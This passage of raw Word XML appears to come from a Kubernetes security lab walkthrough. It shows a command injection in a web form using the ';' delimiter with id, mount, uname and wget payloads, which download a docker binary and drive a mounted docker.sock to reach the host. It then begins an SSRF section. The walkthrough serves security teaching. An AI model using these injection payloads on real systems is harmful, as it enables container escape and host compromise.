          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Start by checking that DNS resolution is working for your cluster. If this doesn't work, check if you have a DNS service like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CoreDNS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> running on your cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7708C" w:rsidRDefault="00A7708C" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Running this on server address </w:t>
      </w:r>
      <w:r w:rsidR="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00EC739B" w:rsidRPr="00BF308C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EC739B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00EC739B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">By looking at the application functionality and dabbling with the input and output, we can see it has standard command injection vulnerability. Assuming it's running in a Linux container we can use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> delimiter to run/pass other commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Running this on server address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>127.0.0.1; id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2351144"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="Scenario 2 Command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enario 2 Command Injec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51144"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRPr="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00EC739B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">As we can see it returns the response for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, now we can analyze the system and see what potential information we can obtain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRPr="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00EC739B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">It contains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> mounted into the file system as it's not available commonly in standard systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Running this on server address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>; mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3609892"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="Scenario 2 m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enario 2 mou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09892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRDefault="00EC739B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> can see the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/custom/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC739B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> mounted in the file system and assuming it's mounted from the host system we need to talk to it for communicating with the UNIX socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC739B" w:rsidRPr="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we can download the official </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> static binary from the internet </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00122ED0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>https://download.docker.com/linux/static/stable/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>. In order to determine which binary we need, we can run the following command for system discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Running this on server address “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> –a”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRPr="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We can examine the output to determine our system architecture and OS, then download the appropriate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary to the container. For example, if our target system is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> x86_64 Linux box, we can use the following command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Running this on server address </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00BF308C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00BF308C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>tmp</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00BF308C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>/docker-19.03.9.tgz</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We can extract the binary from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker-19.03.9.tgz</w:t>
      </w:r>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file so that we can use that to talk to the UNIX socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Running this on server address “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;tar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>xvzf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/docker-19.03.9.tgz -C /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2118198"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="Scenario 2 extract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enario 2 extract bina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18198"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can access the host system by running the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands with passing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNIX socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Running this on server address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122ED0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H unix:///custom/docker/docker.sock images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRPr="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00122ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943442" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="Scenario 2 list hos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enario 2 list host images"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="89953"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="419111"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122ED0" w:rsidRDefault="00122ED0" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRPr="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSRF in the Kubernetes (K8S) world</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This scenario is to showcase the popular application security vulnerability getting exploited everywhere in the cloud environments. Now we will try to see how it impacts the Kubernetes clusters, internal services, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well. This has quite a large impact in cloud native environments, one of the real-world examples include </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00071902">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>Shopify - SSRF in Exchange leads to ROOT access in all instances</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">To get started with the scenario, navigate to </w:t>
      </w:r>
